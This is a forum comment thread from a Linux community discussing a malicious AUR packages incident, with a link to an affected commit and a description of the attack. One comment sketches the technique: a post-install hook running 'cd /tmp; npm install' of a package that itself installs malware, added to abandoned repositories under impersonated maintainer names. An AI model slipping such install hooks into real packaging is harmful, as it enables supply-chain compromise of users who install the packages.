104
Active AUR malicious packages incident
(archlinux.org)
you are viewing a single comment's thread
view the rest of the comments
view the rest of the comments
this post was submitted on 12 Jun 2026
104 points (100.0% liked)
Linux
13931 readers
432 users here now
A community for everything relating to the GNU/Linux operating system (except the memes!)
Also, check out:
Original icon base courtesy of lewing@isc.tamu.edu and The GIMP
founded 3 years ago
MODERATORS
Holy crap, so many!
Is this a concerted effort (by evil hackers)? (edit: yes. was.)
Can we still see an example of an affected PKGBUILD or git repo? I just tried some randomly and they all seem fixed already.
One example: https://aur.archlinux.org/cgit/aur.git/commit/?h=oracle-bin&id=eceeb808ef933a66285ea68cefd72c1b5f4374c9 . It seems the AUR team forcepushed the malicious commits out of the repo branches, likely to prevent being accidentally reused by git-bisect in the future, but the URLs still seem to work until they run garbage collection. The author/committer information on each affected commit impersonated a previous maintainer of that particular repository and isn't real.
The whole thing essentially just boils down to adding a
cd /tmp; npm install [random crap]post-install hook to every abandoned repository they easily got access to, which itself had a post-install hook to set up malware things. npm has nulled the affected packages, though it took them somewhere around 24 hours to do so. atomic-lockfile was one of them.